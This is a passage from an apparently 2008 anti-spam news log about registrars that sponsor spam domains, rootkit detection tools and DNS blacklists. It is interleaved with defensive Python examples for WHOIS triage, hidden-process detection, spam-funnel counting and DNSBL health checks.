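        "Registrant Email: jane.doe@mail.invalid\n"
        "Registrant Phone: +1.3035551234\n"
    ),
}

CONTACT_FIELDS = ("registrant name", "registrant email", "registrant phone")
# Assumed placeholder lists; a real deployment would tune these from data.
PLACEHOLDER_LOCALPARTS = {"test", "none", "admin", "abc", "asdf", "xxx"}
PLACEHOLDER_DOMAINS = {"test.com", "example.com", "domain.com"}


def parse_whois(text: str) -> dict:
    """Turn 'Field: value' lines into a dict keyed by lower-cased field name."""
    rec = {}
    for line in text.splitlines():
        if ":" in line:
            key, value = line.split(":", 1)
            rec[key.strip().lower()] = value.strip()
    return rec


def whois_problems(rec: dict) -> list:
    """Heuristic plausibility checks on one parsed record."""
    problems = [f"missing {f}" for f in CONTACT_FIELDS if not rec.get(f)]
    email = rec.get("registrant email", "").lower()
    if email and "@" in email:
        local, domain = email.rsplit("@", 1)
        if local in PLACEHOLDER_LOCALPARTS or domain in PLACEHOLDER_DOMAINS:
            problems.append("placeholder email")
    digits = re.sub(r"\D", "", rec.get("registrant phone", ""))
    # Five or more trailing zeroes, or a number made of one or two digits,
    # is the kind of filler a registrant types to get past a required field.
    if digits and (re.search(r"0{5,}$", digits) or len(set(digits)) <= 2):
        problems.append("implausible phone")
    return problems


def triage(records: dict) -> dict:
    """Map each domain to its problem list (an empty list means it passed)."""
    return {d: whois_problems(parse_whois(t)) for d, t in records.items()}


def flagged_by_registrar(records: dict) -> Counter:
    """Count flagged domains per sponsoring registrar."""
    counts = Counter()
    for text in records.values():
        rec = parse_whois(text)
        if whois_problems(rec):
            counts[rec.get("registrar", "(unknown)")] += 1
    return counts


def top_registrar_share(records: dict, n: int) -> float:
    """Fraction of flagged domains held by the n busiest registrars: the
    shape of the 'X% of illicit domains at N registrars' figures above."""
    counts = flagged_by_registrar(records)
    total = sum(counts.values())
    return sum(c for _, c in counts.most_common(n)) / total if total else 0.0


if __name__ == "__main__":
    for domain, problems in triage(SAMPLE_RECORDS).items():
        print(domain, "->", problems or "ok")
    print(flagged_by_registrar(SAMPLE_RECORDS))
    print(f"share at top registrar: {top_registrar_share(SAMPLE_RECORDS, 1):.0%}")
```

The checks are deliberately coarse: they are a triage filter that says which records deserve a human look and a WDPRS report, not a verdict on the registrant. The per-registrar count is the piece that turns a pile of bad records into the balloon-knot view, since the same handful of registrars keeps turning up once the flagged domains are grouped.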
May 19, 2008
So who are the top 10 registrars most favored by spammers? You can see the list along with Knujon's methodology here.
A few of the names on it are unsurprising simply by virtue of their market share. Number five -- Bellevue, Wash., based eNom -- is the second largest registrar, according to DomainTools's registrarstats.com. Number six -- Pompano Beach, Fla., based Moniker -- has the eighth largest market share among registrars.
But size doesn't explain most of the names on the list. The registrars that scored the worst overall -- Xinnet Bei Gon Da Software, BEIJINGNN, and Todaynic -- are all located in China, and are 18th, 47th and 99th in terms of market share, respectively.
Perhaps the most interesting name on the list is number 7 -- a registrar out of Broomfield, Colo., called Dynamic Dolphin. According to Knujon, more than 10 percent of the company's 45,000-plus domains have false WHOIS data, and more than 17 percent of the domains registered through the company have been observed being advertised through spam.
A bit of digging into Dynamic Dolphin revealed that it is owned by a company called CPA Empire, which in turn is owned by Media Breakaway LLC. Those of you who read this post a few weeks back will recognize this company: Its CEO is Scott Richter, a notorious, self-avowed spammer who claims to have quit the business.
As I noted in that post, anti-spam groups claim that Media Breakaway recently hijacked more than 65,000 IP addresses for use in sending e-mail and hosting commercial Web sites.
(blog.washingtonpost.com/securityfix/)
May 18, 2008
GMER is an application that detects and removes rootkits. It scans for: hidden processes, hidden threads, hidden modules, hidden services, hidden files, hidden Alternate Data Streams, hidden registry keys, drivers hooking SSDT, drivers hooking IDT, drivers hooking IRP calls, inline hooks
(gmer.net)
May 17, 2008
RootkitRevealer is an advanced rootkit detection utility. It runs on Windows NT 4 and higher and its output lists Registry and file system API discrepancies that may indicate the presence of a user-mode or kernel-mode rootkit. RootkitRevealer successfully detects all persistent rootkits published at www.rootkit.com, including AFX, Vanquish and HackerDefender (note: RootkitRevealer is not intended to detect rootkits like Fu that don't attempt to hide their files or registry keys).
(technet.microsoft.com)
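Both tools above rely on cross-view comparison: enumerate the same objects (processes, files, registry keys) through the normal API and again through a lower-level path, then report whatever only the low-level path sees. The Linux analogue below is an added example, not code from GMER or RootkitRevealer; it compares the /proc listing against a kill(pid, 0) probe of every PID and assumes a Linux host. The sets passed to diff_views in the test are constructed.

```python
"""Cross-view hidden-process detection, the principle behind GMER's and
RootkitRevealer's 'hidden' findings, shown on Linux.

Added example, not code from either tool. High-level view: the /proc
directory listing (what ps sees). Low-level view: probing every PID with
kill(pid, 0), which takes a different kernel path than readdir on /proc.
Assumes a Linux host.
"""
import os


def diff_views(high_level, low_level):
    """Compare two enumerations of the same object space.

    Objects seen only by the low-level path are the rootkit indicator
    (something is filtering the API-level view). Objects seen only by the
    high-level path usually just exited between the two scans; they are
    reported separately so a race is not mistaken for a rootkit.
    """
    hi, lo = set(high_level), set(low_level)
    return {"hidden": sorted(lo - hi), "transient": sorted(hi - lo)}


def procfs_pids():
    """High-level view: PIDs that /proc (and therefore ps, top) shows."""
    return {int(name) for name in os.listdir("/proc") if name.isdigit()}


def procfs_tids():
    """Thread IDs also answer kill(); collect them so the threads of a
    visible process are not reported as hidden processes."""
    tids = set()
    for pid in procfs_pids():
        try:
            tids.update(int(t) for t in os.listdir(f"/proc/{pid}/task"))
        except (FileNotFoundError, PermissionError, ProcessLookupError):
            continue
    return tids


def read_pid_max(default=32768):
    try:
        with open("/proc/sys/kernel/pid_max") as f:
            return int(f.read().strip())
    except OSError:
        return default


def probe_pids(max_pid):
    """Low-level view: kill(pid, 0) delivers no signal but reports whether
    the PID exists. ESRCH -> no such process; EPERM -> exists, not ours."""
    found = set()
    for pid in range(1, max_pid + 1):
        try:
            os.kill(pid, 0)
        except ProcessLookupError:
            continue
        except PermissionError:
            pass
        found.add(pid)
    return found


def scan_live():
    """PIDs that the kernel admits exist but /proc does not show."""
    visible = procfs_pids() | procfs_tids()
    return diff_views(visible, probe_pids(read_pid_max()))


if __name__ == "__main__":
    print(scan_live())
```

Run it twice and intersect the "hidden" results to drop PIDs that merely came and went between the two enumerations. The limitation is the same one RootkitRevealer's note spells out: a rootkit that filters both views consistently (here, hooking sys_kill as well as /proc; on Windows, patching the raw volume path as well as the Win32 API) produces no discrepancy, and a rootkit that does not hide at all, like Fu, produces none either.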
May 16, 2008
The Federal Trade Commission's just-approved new rule provisions for the
CAN-SPAM Act largely place the onus on e-mail marketers and their
affiliates to take responsibility for clean e-mail lists and clear
communication among marketing partners.
(dmnews.com)
May 15, 2008
AntiEvilTools Project is a non-governmental voluntary organization of the Forum (www.antiprotect.com) dedicated to open-source security software.
It is built on the open-source enthusiasm of its participants and is best seen as a platform for study and exchange. Its members include kernel driver development experts, programmers well versed in algorithms, and students full of enthusiasm for learning. To participate, submit a demo of your own work to n0bele@163.com. Once it passes review, you will be given access to all AntiEvilTools source code.
(rootkit.com)
May 14, 2008
Three men have been indicted for hacking into a number of cash registers at Dave & Buster's restaurant locations nationwide to steal data from thousands of credit and debit cards, data that was later sold or used to cause more than $600,000 in losses, the Justice Department said this week.
(blog.washingtonpost.com/securityfix)
May 13, 2008
A recent report by security software maker Symantec reveals that spam accounted for an average of 80 percent of traffic hitting e-mail gateways in April, spiking as high as 87 percent at times. That is a daunting figure, but Garth Bruen of KnujOn looks at the problem in a different way.
According to a study being presented this week by KnujOn to the High Technology Crime Investigation Association, 90 percent of the illicit Web sites using spam to generate traffic are clustered on just 20 registrars — that is only 2.5 percent of the 800 registrars accredited by the Internet Corporation for Assigned Names and Numbers.
That can make the spam problem seem almost manageable.
(gcn.com)
Strategic Developer | Martin Heller: "20 registrars control 90% of illicit domains, says Knujon"
(weblog.infoworld.com)
May 12, 2008
Upload your file for testing here: virustotal.com
VirusTotal is a service that analyzes suspicious files and facilitates the quick detection of viruses, worms, trojans, and all kinds of malware detected by antivirus engines.
Specs: Free, independent service, Use of multiple antivirus engines, Real-time automatic updates of virus signatures, Detailed results from each antivirus engine, Real time global statistics
(virustotal.com)
May 11, 2008
90% of the illicit sites tracked by KnujOn.com are clustered at just 20 registrars which is only 2.5% of the entire registrar population. While networks of compromised spam generators, "bot-nets" are large and millions of spam emails are constantly sent, the number of final destination websites is considerably smaller, and the number of sponsors of those domains is even more concentrated.
(prweb.com)
This is just one of the issues we will be discussing at the Ohio HTCIA Chapter 2008 Spring Training Conference, Monday May 12 at 3:30pm in H-1095 and Tuesday May 13 at 10:30 in H-1095 in the Clocktower building at Lakeland Community College (Full Schedule).
What is the HTCIA?
"The High Technology Crime Investigation Association (HTCIA) is designed to encourage, promote, aid and effect the voluntary interchange of data, information, experience, ideas and knowledge about methods, processes, and techniques relating to investigations and security in advanced technologies among its membership." (htcia.org)
May 10, 2008
Cellphones have become consumers’ most personal technological devices. Some industry executives, along with consumer groups and security experts, are concerned that unwanted text messages on phones will be an even greater headache than unwanted computer messages.
Cellphone spam is particularly annoying to its recipients because it is more invasive — announcing itself with a beep — and can be costly.
(nytimes.com)
May 8, 2008
There are over 800 ICANN Accredited Registrars and thousands of ISPs. Most providers are playing by the rules. The ones that are not adhering to policy are wreaking the most havoc across the web. Some of these providers merely have poor verification or auditing, others may be active partners to illicit activity, and KnujOn is sorting out just which is which. What this means is that all the zombie-bot generated spam is intended to drive your attention to a very small subset of the Internet's infrastructure. The problem looks bigger than it really is. In short, the fake pharmacies, knockoff product websites, pirate software stores, phony lending institutions - the websites where the transactions occur - are generally under the control of a small number of companies. Products sold on these sites have a sordid history and those behind these operations have helped push illicit traffic profits into the hundreds of billions of dollars per year.
To clarify this relationship it is important to understand that the botnets are huge; the smaller population being referred to here is the actual advertised landing sites. It gets confusing when everyone is talking about "sources" and various numbers. Take this as an example: a botnet with 100,000 machines sends a 2 million message email blast (example, not real numbers). The spam messages actually only reference 200 - 500 URI links. The URIs are often redirects that boil down to only 100 - 200 real domains, and 90% of these domains are controlled by 2.5% of the registrar population. So, we've got lots of senders, lots of messages, but they are herding victims into a very small corral.
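The funnel described above (senders, messages, URIs, landing domains, registrars) can be measured from a spam corpus. The script below is an added example and not KnujOn's own code; its corpus, redirect map and registrar map are constructed for illustration, where a real run would take the messages from a spam feed, follow the HTTP redirects, and look up each landing domain's registrar in WHOIS.

```python
"""The spam funnel: many bots and messages, a handful of URIs, fewer landing
domains, and a very small set of sponsoring registrars.

Added example, not KnujOn's code. SPAM_CORPUS, REDIRECTS and REGISTRAR_OF
are constructed; in practice they come from a spam feed, from following
HTTP redirects, and from WHOIS lookups.
"""
import re
from collections import Counter
from urllib.parse import urlsplit

URL_RE = re.compile(r"https?://[^\s\"'<>)]+", re.IGNORECASE)

# Constructed corpus: (sending bot, message body)
SPAM_CORPUS = [
    ("bot-a", "Cheap meds today: http://trk1.example/a1"),
    ("bot-b", "Cheap meds today: http://trk1.example/a2"),
    ("bot-c", "Replica watches http://trk2.example/w1 or http://trk2.example/w2"),
    ("bot-a", "Instant loan approval http://fastloan-xyz.example/apply"),
    ("bot-d", "OEM software http://trk1.example/s9"),
    ("bot-b", "Cheap meds today: http://trk1.example/a1"),
]

# Constructed redirect map: tracker URL -> next hop
REDIRECTS = {
    "http://trk1.example/a1": "http://pills-shop.example/?c=1",
    "http://trk1.example/a2": "http://pills-shop.example/?c=2",
    "http://trk2.example/w1": "http://trk2.example/w2",
    "http://trk2.example/w2": "http://replica-store.example/",
    "http://trk1.example/s9": "http://oem-soft.example/",
}

# Constructed registrar map: registered domain -> registrar (from WHOIS)
REGISTRAR_OF = {
    "pills-shop.example": "Registrar-X",
    "replica-store.example": "Registrar-X",
    "oem-soft.example": "Registrar-X",
    "fastloan-xyz.example": "Registrar-Y",
}


def extract_urls(body):
    return URL_RE.findall(body)


def resolve(url, redirects, max_hops=10):
    """Follow the redirect chain to the landing URL; stop on loops."""
    seen = set()
    while url in redirects and url not in seen and len(seen) < max_hops:
        seen.add(url)
        url = redirects[url]
    return url


def registered_domain(url):
    """Naive registrable-domain cut (last two labels). A real run would use
    a public-suffix list so co.uk-style hosts are not collapsed wrongly."""
    host = (urlsplit(url).hostname or "").strip(".")
    labels = host.split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host


def funnel(corpus, redirects, registrar_of):
    """Collapse senders -> messages -> URIs -> landing domains -> registrars."""
    senders = {bot for bot, _ in corpus}
    uris = {u for _, body in corpus for u in extract_urls(body)}
    domains = {registered_domain(resolve(u, redirects)) for u in uris}
    registrars = Counter(registrar_of.get(d, "unknown") for d in domains)
    return {
        "senders": len(senders),
        "messages": len(corpus),
        "uris": len(uris),
        "domains": len(domains),
        "registrars": registrars,
    }


def registrars_covering(registrars, fraction=0.9):
    """How many registrars (largest first) sponsor at least `fraction` of the
    landing domains: the knot of the balloon."""
    total = sum(registrars.values())
    needed = fraction * total
    covered = 0
    for rank, (_, count) in enumerate(registrars.most_common(), start=1):
        covered += count
        if covered >= needed:
            return rank
    return len(registrars)


if __name__ == "__main__":
    stats = funnel(SPAM_CORPUS, REDIRECTS, REGISTRAR_OF)
    print(stats)
    print("registrars covering 90%:", registrars_covering(stats["registrars"]))
```

On the constructed corpus, six messages from four bots carry six distinct URIs that collapse to four landing domains, three of them sponsored by one registrar; the same counting over a real feed is what produces the "90% of domains at 2.5% of registrars" figure. The unknown-registrar bucket is worth watching in a real run, since a landing domain whose WHOIS cannot be resolved is itself a policy finding.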
To be part of the solution, send your junk email to: knujon@coldrain.net.
May 7, 2008
There are many approaches to deal with forgotten passwords. All rely either on proving access to some resource (such as a pre-registered email account), or on the long-term memory of the person who needs to restore access to his or her account. Most approaches are not very secure, and many are hard for legitimate users to manage. To make it worse, many approaches are unsuitable for input-constrained devices, such as mobile phones.
It is well known in the cognitive science literature that personal preferences are more stable than long-term memory. A system based on personal preferences is also less vulnerable to data-mining attacks than one that relies on more traditional facts (such as mother's maiden names or childhood address). We propose a system that is secure and practical: It takes less than thirty seconds to authenticate (whether on a computer or a handheld), and has a false negative rate of close to 0% and a false positive rate of less than 1%. For many environments, Blue Moon Authentication may very well be the best approach there is.
(ravenwhite.com)
May 6, 2008
MySpace has won a lawsuit against notorious spammer Sanford (Spamford) Wallace. The social networking website gained a default judgment against Wallace after he failed to turn over documents or appear in court, CNet reports. (theregister.co.uk)
May 5, 2008
Spam celebrates its 30th birthday on Saturday (3 May).
On that day in 1978, 393 Arpanet subscribers were sent what's reckoned to be the first ever spam email in history (the message itself was written on 1 May 1978).
DEC marketing rep Gary Thuerk came up with the wheeze which produced a fierce backlash from Arpanet (military) administrators, as well as a small number of sales.
After first appearing on Arpanet, unsolicited bulk commercial ads moved over to Usenet, email and websites links. Much to the chagrin of Hormel Foods, the term spam was applied to the phenomenon in a pop-culture reference to the spam skit from Monty Python's Flying Circus, where all meals in a restaurant come with spam, spam and more spam. Junk email - not nourishing luncheon meat - has become the principal meaning of the word spam.
(theregister.co.uk)
At 30, Spam Going Nowhere Soon - Audio (npr.org)
May 4, 2008
May 3, 2008
For companies like Microsoft, domain tasting creates the constant headache of chasing after typo-squatters — those who create and register Web sites with misspelled variations of the Microsoft name. For individual users, it means that millions of names are tied up in a constant churn of registering and returning names before fees are charged.
Now Icann — the Internet Corporation for Assigned Names and Numbers, the organization based in California that manages domain names — is considering steps to stamp out the practice.
The board of Icann will vote in Paris in June on a proposal to severely limit the number of domain names that can be returned without a fee, but the organization is facing resistance from domain name registrars, who are against ending the grace period.
These companies, which are licensed to register and sell new domain names, are themselves divided on the issue. Some argue that domain tasting is eroding consumer trust. Others insist that the grace period allows time to correct registrations that were spelled incorrectly.
(iht.com)
May 2, 2008
Some of the common tests used by Web sites to distinguish between legitimate flesh-and-blood visitors and malicious human-mimicking computers recently appear to have been outwitted.
Last month, the human verification tests, which typically require users to identify deformed letters set against a cluttered backdrop, were broken by a computer. The computer then repeatedly created free Hotmail e-mail accounts and sent spam from them, according to Websense, the security firm that detected the hacking.
(washingtonpost.com)
May 1, 2008
Many people are switching from Internet Explorer to alternative browsers such as Firefox and Safari. Though that might make them feel more secure, the shift has also opened new doors for bad guys.
...
So forget the idea that just because you've switched to a new browser, you're magically safer. You may be for a time, but to stay safe with any software, you need to keep current with fixes.
(washingtonpost.com)
April 30, 2008
There are dozens of video clips on the Web site YouTube showing teens getting high smoking or chewing salvia, a hallucinogenic herb related to sage and mint.
The clips show young people laughing, and claiming to see walls melting before their eyes. The drug is legal in all but six states.
According to the National Drug Intelligence Center, users typically experience vivid hallucinations, out-of-body experiences and feelings of merging with inanimate objects.
Salvia is not only legal, it is readily available.
(wtov9.com)
Hallucinogenic Herb Called Salvia Could Be the 'New Marijuana,' and Florida Lawmakers Might Ban It (foxnews.com)
Legal status of Salvia divinorum (wikipedia.org)
Salvia divinorum (wikipedia.org)
April 29, 2008
Some customers may think writing the terms on the panel on the back of the cards would deter fraud or forgery. But Visa's rules for merchants say that "In reality, criminals don't take the time to practice signatures: They use cards as quickly as possible after a theft and prior to the accounts being blocked. They are actually counting on you not to look at the back of the card and compare signatures - they may even have access to counterfeit identification with a signature in their own handwriting."
(boston.com)
April 28, 2008
According to FORTUNE magazine one of the world's shrewdest and wealthiest investors has a below average credit rating. Why? Someone took out a loan in his name at a Nevada HSBC bank and never paid it back. Famous victims of identity theft have included Paul Allen, Steven Spielberg, George Lucas, Oprah Winfrey, Ross Perot, and Michael Bloomberg.
April 27, 2008
The Internet is slowly inching closer to ratcheting up the security of its Domain Name System (DNS) server architecture: The Internet Corporation for Assigned Names and Numbers (ICANN) plans to go operational with the secure DNS technology, DNSSEC, later this year in one of its domains.
(darkreading.com)
April 26, 2008
High street chains will be the next victims of cyber terrorism, some of the world's elite hackers have warned.
They claim it is only a "matter of time" before the likes of Tesco and Marks & Spencer are targeted.
Criminals could use the kind of tactics which crippled Estonia's government and some firms last year, they warned.
(news.bbc.co.uk)
April 25, 2008
This story is disturbing. In what was described as a "common practice," White House staff and others attending a meeting with President Bush left their BlackBerrys sitting unattended on a table outside the meeting room. With the meeting in progress, a Mexican press attaché decided to lift six or seven of them and make a run for it. Thankfully, the Secret Service was able to catch him before he got too far. What I want to know is, what are government BlackBerrys doing sitting on an unprotected table?
(informationweek.com)
April 24, 2008
The use of cyberspace to target U.S. victims and infrastructure, jeopardizing the security of personal information, the stability of business and government infrastructures and the security and solvency of financial investment markets.
The manipulation of securities exchanges and engaging in sophisticated fraud schemes that rob U.S. investors, consumers and government agencies of billions of dollars.
(cnn.com)
April 23, 2008
OnGuardOnline.gov provides practical tips from the federal government and the technology industry to help you be on guard against Internet fraud, secure your computer, and protect your personal information.
(onguardonline.gov)
A partnership between the federal government and the technology industry (APWG is a partner) to help consumers be on guard against Internet fraud, secure their computers, and protect their personal information. The new videos also are featured at youtube.com/ftcvideos and on the FTC site at ftc.gov.
April 22, 2008
The hackers that broke into Hannaford Brothers, a northeast U.S. grocery chain, may have spawned other attacks, including one at Okemo Resorts in Ludlow VT. As law enforcement and forensic experts continue to sift through the evidence of these attacks, the retailer and the ski resort remain mum on further developments.
(bankinfosecurity.com)
April 19, 2008
LONDON, England (CNN) -- If a vintage Ferrari for $30,000 sounds too good to be true, that's probably because it is.
But when a counterfeit classic is so good that even the experts are impressed, some buyers just can't resist the object of their desire at a knockdown price.
(cnn.com)
Video
April 17, 2008
Uncle Sam wants you—to help defend against Internet threats. But is the military any place for slackers and hackers? (businessweek.com)
April 16, 2008
SAN FRANCISCO — An e-mail scam aimed squarely at the nation’s top executives is raising new alarms about the ease with which people and companies can be deceived by online criminals.
(nytimes.com)
April 15, 2008
The US homeland security chief has made a heartfelt plea to Silicon Valley workers to stand up and be counted in the fight to secure the cyber highway.
Michael Chertoff invoked the attacks of 9/11 as he sought to galvanise IT professionals and security experts.
(news.bbc.co.uk)
April 14, 2008
In November 2006, the Federal Trade Commission held a huge conference on the challenges that American consumers would face in the next "Tech-Ade." The groan-inducing title aside, the event was a chance for the Commission staff to hear from assorted technology experts about the key issues that the FTC would have to police over the next ten years. Now, a year and a half after the conference, the Commission has finally written up (PDF) the "major trends identified at the hearings." They are old news by now (social networking is hot!), but the document does give us some insight into FTC priorities; hopefully, the Commission can deliver on its goals of ensuring consumer data privacy, monitoring behavioral advertising, and working globally to combat spam and spyware.
(arstechnica.com)
April 11, 2008
A new cybercrime book that KnujOn creator Garth Bruen helped edit and review is available. We highly recommend
Crimeware: Understanding New Attacks and Defenses, by Markus Jakobsson and Zulfikar Ramzan.
Available at
Amazon, Informit, oreilly
Crimeware: Understanding New Attacks and Defenses will help security professionals, technical managers, students, and researchers understand and prevent specific crimeware threats. This book guides you through the essential security principles, techniques, and countermeasures to keep you one step ahead of the criminals, regardless of evolving technology and tactics. Security experts Markus Jakobsson and Zulfikar Ramzan have brought together chapter contributors who are among the best and the brightest in the security industry. Together, they will help you understand how crimeware works, how to identify it, and how to prevent future attacks before your company’s valuable information falls into the wrong hands. In self-contained chapters that go into varying degrees of depth, the book provides a thorough overview of crimeware, including not only concepts prevalent in the wild, but also ideas that so far have only been seen inside the laboratory.
With this book, you will
- Understand current and emerging security threats including rootkits, bot networks, spyware, adware, and click fraud
- Recognize the interaction between various crimeware threats
- Gain awareness of the social, political, and legal implications of these threats
- Learn valuable countermeasures to stop crimeware in its tracks, now and in the future
- Acquire insight into future security trends and threats, and create an effective defense plan
With contributions by Gary McGraw, Andrew Tannenbaum, Dave Cole, Oliver Friedrichs, Peter Ferrie, and others.
April 10, 2008
(AP) Attorney General Michael Mukasey warned Friday that the huge profits generated from piracy and counterfeiting are increasingly flowing into the coffers of terrorist groups. In remarks to Silicon Valley executives at the Tech Museum of Innovation, Mukasey said the economy and national security of the United States are increasingly threatened by violations involving copyrighted software code, patented inventions and trademarked properties. Terror groups are taking their cues from organized crime and increasingly funding their operations from counterfeiting and piracy, he said. Mukasey said his department is devoting more resources to prosecuting intellectual property crimes, which led to a 7 percent increase in the number of IP cases filed in 2007 over the year before and a 33 percent increase over 2005. "Criminal syndicates, and in some cases even terrorist groups, view IP crime as a lucrative business and see it as a low-risk way to fund other activities," Mukasey said. "A primary goal of our IP enforcement mission is to show these criminals that they're wrong."...
(cbsnews.com)
April 9, 2008
The State Department official in charge of U.S. passport services stepped down yesterday amid investigations into security breaches in the document records and overcharges for blank passports. In the latest blow against the agency, court documents show a State Department employee provided personal information from passport applications for use in a credit-card fraud scheme. Deputy Assistant Secretary for Passport Services Ann Barrett left her post yesterday, a move that State Department Spokesman Tom Casey attributed to management changes. The personnel move comes after The Washington Times first reported last month that three State Department contract employees were being investigated for improperly accessing the passport data of three presidential candidates. The Times also has reported on overcharges for blank passports produced by the U.S. Government Printing Office... (washingtontimes.com)
April 8, 2008
Webroot estimates over 42,000 spam emails for every single business email account in 2008 (ciol.com)
April 7, 2008
The online behavior of a small but growing number of computer users in the United States is monitored by their Internet service providers, who have access to every click and keystroke that comes down the line.
The companies harvest the stream of data for clues to a person's interests, making money from advertisers who use the information to target their online pitches.
(washingtonpost.com)
April 6, 2008
Technical analysis of the Phorm online advertising system has reinforced an expert's view that it is "illegal".
(news.bbc.co.uk)
April 5, 2008
Internet crime is at an all time high, according to figures from the FBI, which said that losses totalled $240m last year.
The agency's Internet Crime Complaint Center (IC3) received 206,884 complaints of web-based crimes in the US last year, and said that total losses had risen by $40m compared to the previous year.
"The internet presents a wealth of opportunity for would-be criminals to prey on unsuspecting victims, and this report shows how extensive these types of crime have become," said FBI Cyber Division assistant director James E. Finch.
(vnunet.com)
April 4, 2008
WASHINGTON (AP) — Money lost in Internet-related crimes hit a new high last year, topping about $240 million, according to a government report showing increases in scams involving pets, check-cashing schemes and online dating.
The number of reported Internet scams dropped slightly from previous years, but the total lost jumped $40 million, according to the report released Thursday by the FBI and the National White Collar Crime Center.
(ap.google.com)
April 3, 2008
Spam continues to blight e-mail exactly 15 years after the term was first coined and almost 30 years since the first spam message was sent.
The term is thought to have been coined by Joel Furr, an administrator on the net discussion system Usenet, to refer to unsolicited bulk messages.
More than 90% of all e-mail is spam, according to anti-spam body Spamhaus.
(bbc.co.uk)
April 2, 2008
Framingham retailer TJX Cos. reached a settlement with MasterCard Inc. in which it will pay up to $24 million to banks and other institutions to cover fraud losses stemming from a massive data breach disclosed last year.
TJX, parent of discount retail chains including TJ Maxx and Marshalls, struck a similar deal with rival card network Visa in which it agreed to pay up to $40.9 million. As in that deal, TJX said the costs of its MasterCard settlement are included in the $256 million the company has set aside to pay for computer work and other costs associated with the breach.
(boston.com)
April 1, 2008
When the U.S. Federal Trade Commission announced a US$2.9 million settlement with online marketing firm ValueClick this month, it was a record monetary settlement under the 4-year-old CAN-SPAM Act...
But despite these recent court cases, some critics don't see a lot of value in CAN-SPAM, short for Controlling the Assault of Non-Solicited Pornography and Marketing.
"CAN-SPAM has had virtually no impact on the spam problem at large," said Ray Everett-Church, a longtime spam fighter and director of policy and professional services at Habeas, a company that provides e-mail authentication services.
March 31, 2008

KnujOn's Policy Enforcement model finished right behind the "best overall paper",
Jonathan Zdziarski's research on Reasoning-Based Adaptive Parsing (PDF).
Congratulations to Jonathan and special thanks to Bill Yerazunis of
the Mitsubishi Electric Research Laboratories (MERL) for running this event.
March 30, 2008
For more than a year the ORDB blacklist, which had previously been in heavy use, has been empty. Every DNS query to the relays.ordb.org zone would return NXDOMAIN (non-existent domain), which a mail server reads as "not listed".
To report a hit, DNS queryable blacklists (DNSBLs) usually respond with an IP address in the 127.x.x.x range, and since Tuesday the name server responsible for the name range under relays.ordb.org does just that for every query, such as 4.3.2.1.any.relays.ordb.org. Andreas Plesner Jacobsen, a former ORDB operator, explained to heise online sister publication iX that this measure has been introduced because the zone is still swamped with queries. The intention is to get mail server operators to stop using ORDB. Simply deleting the domain was not a viable alternative, since the load would then merely be directed to the .org name servers.
Admins should check their mail server and spam filter configurations to make sure that ORDB is not in use. This should be relatively easy to determine in most cases, since positive responses from DNSBLs often result in emails being filtered outright, and in this case every sender is now a positive response, so inbound email stops completely. A somewhat more complicated scenario is when DNSBL responses are taken into account as just one of a number of spam scoring criteria; in that case the new measure would only gradually become apparent to postmasters still using ORDB.
(heise-online.co.uk)
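The check heise describes can be automated. The script below is an added example, not code from heise online or ORDB: it builds the reversed-octet query name, interprets a 127.0.0.0/8 answer as a listing, and then tests a zone against the two conventional test points (127.0.0.2 must be listed, 127.0.0.1 must never be), which separates a healthy list from one that has gone empty or, as ORDB did, started listing everyone. The resolver is passed in as a function, and the three resolvers at the bottom are constructed to stand in for real DNS.

```python
"""DNSBL lookups plus a health check that catches a dead or poisoned list.

Added example, not code from heise online or ORDB. resolve(name) is any
function returning the A records for a name ([] on NXDOMAIN); the three
constructed resolvers at the bottom mimic a healthy list, the empty ORDB
zone of 2007, and the list-everything ORDB zone of March 2008.
"""
import ipaddress

HIT_RANGE = ipaddress.IPv4Network("127.0.0.0/8")


def dnsbl_name(ip, zone):
    """1.2.3.4 checked against relays.ordb.org -> 4.3.2.1.relays.ordb.org"""
    octets = str(ipaddress.IPv4Address(ip)).split(".")
    return ".".join(reversed(octets)) + "." + zone


def is_listed(ip, zone, resolve):
    """Any A record inside 127.0.0.0/8 is a listing; NXDOMAIN is 'clean'.
    (The convention later written down in RFC 5782.)"""
    answers = resolve(dnsbl_name(ip, zone))
    return any(ipaddress.IPv4Address(a) in HIT_RANGE for a in answers)


def dnsbl_health(zone, resolve):
    """Test points: 127.0.0.2 must be listed, 127.0.0.1 must not be.
    'dead'     -> lists nothing   (ORDB through 2007: useless but harmless)
    'poisoned' -> lists everything (ORDB from March 2008: rejects all mail)
    """
    lists_test_point = is_listed("127.0.0.2", zone, resolve)
    lists_loopback = is_listed("127.0.0.1", zone, resolve)
    if lists_test_point and not lists_loopback:
        return "ok"
    if not lists_test_point:
        return "dead"
    return "poisoned"


# --- constructed resolvers standing in for real DNS ----------------------
_HEALTHY = {
    "2.0.0.127.bl.example": ["127.0.0.2"],   # the test point
    "4.3.2.1.bl.example": ["127.0.0.2"],     # one genuinely listed relay
}


def healthy_resolve(name):
    return _HEALTHY.get(name, [])


def ordb_empty_resolve(name):
    return []                                # every query NXDOMAIN


def ordb_2008_resolve(name):
    return ["127.0.0.2"] if name.endswith(".relays.ordb.org") else []


if __name__ == "__main__":
    print("healthy  :", dnsbl_health("bl.example", healthy_resolve))
    print("ordb 2007:", dnsbl_health("relays.ordb.org", ordb_empty_resolve))
    print("ordb 2008:", dnsbl_health("relays.ordb.org", ordb_2008_resolve))
```

Against real DNS the same two probes are `dig +short 2.0.0.127.<zone> A` and `dig +short 1.0.0.127.<zone> A`; a zone that answers the second is exactly the failure heise describes. Where a zone appears in a hard-reject rule, for instance a Postfix `reject_rbl_client relays.ordb.org` entry in the smtpd restrictions, it should be removed before it rejects every connection; where it only adds to a score, the damage is slower but the fix is the same.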
March 29, 2008
Herndon, Va.-based Network Solutions said Wednesday that it suspended Hizbollah.org, an official site of Hezbollah, a Lebanese political and paramilitary group.
Turns out, Network Solutions, which was one of the original firms in the domain registration business, was accepting payment for the domain in violation of a U.S. law that bars American companies from doing business with organizations listed by Uncle Sam as terrorist groups. Closer inspection also reveals that Network Solutions and other U.S.-based Internet service providers and domain registrars provide services to other groups on the government's list of terrorist organizations.
(blog.washingtonpost.com/securityfix)
March 28, 2008
Knujon was presented Thursday and created considerable discussion.
(spamconference.org).
March 27, 2008
Knujon is being presented at the annual MIT Spam Conference
(spamconference.org). Dr. Robert Bruen, will be conducting the presentation at 2:15PM Thursday in the Stata center.
Our presentation represents a critical shift in the last ten years of anti-spam. The topics usually discussed at this forum are focused
on filtering algorithms, smtp protocol design, and spam blacklisting. The presentation of KnujOn's policy enforcement and illicit
network termination work will bring a new perspective to the fight against Internet abuse and electronic fraud.
Thanks for your support of our mission.
March 26, 2008
